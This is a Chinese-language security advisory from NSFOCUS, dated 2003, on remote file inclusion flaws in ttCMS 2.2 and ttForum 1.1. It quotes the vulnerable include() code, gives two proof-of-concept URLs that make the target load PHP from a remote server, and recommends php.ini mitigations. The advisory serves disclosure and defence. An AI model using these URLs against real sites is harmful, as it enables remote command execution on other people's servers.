首页 -> 安全研究

安全研究

安全漏洞
ttCMS / ttForum远程文件包含漏洞

发布日期:2003-05-09
更新日期:2003-05-15

受影响系统:
ttCMS ttCMS 2.2
ttForum ttForum 1.1
描述:
BUGTRAQ  ID: 7542

ttCMS/ttForum是两款基于WEB的论坛程序。

ttCMS/ttForum包含的多个脚本对用户提供的输入缺少正确过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。

ttCMS/ttForum包含的modules/forum/News.php脚本包含如下代码:

include($template . '.' . $ext);

此变量用于从用户输入中直接获得包含文件,由于没有进行初始化,因此可以通过全局注入来进行变量定义,攻击者可以指定远程系统中的PHP文件作为参数提交给$template变量,可导致以WEB服务进程权限执行PHP文件中包含的恶意代码。

ttForum/ttCMS包含的install.php脚本也存在此漏洞,包含如下代码:

("$installdir/Settings.php")

由于没有对$installdir变量进行正确处理,可导致以WEB进程权限执行PHP文件中包含的恶意代码。

<*来源:Charles Reinold (creinold@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105250175812151&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Charles Reinold (creinold@hotmail.com)提供了如下测试方法:

http://www.yourserver.com/ttforum/index.php?action=news;board=1;template=http://www.yourserver.com/modules/forum/helpadmin;ext=help

http://target-system/install.php?step=7&installdir=http://yourserver/

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 编辑php.ini文件,设置'allow_url_fopen'和'register_globals'选项为'off'。

厂商补丁:

ttCMS
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ttcms.com

ttForum
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ttforum.com

浏览次数:3231
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障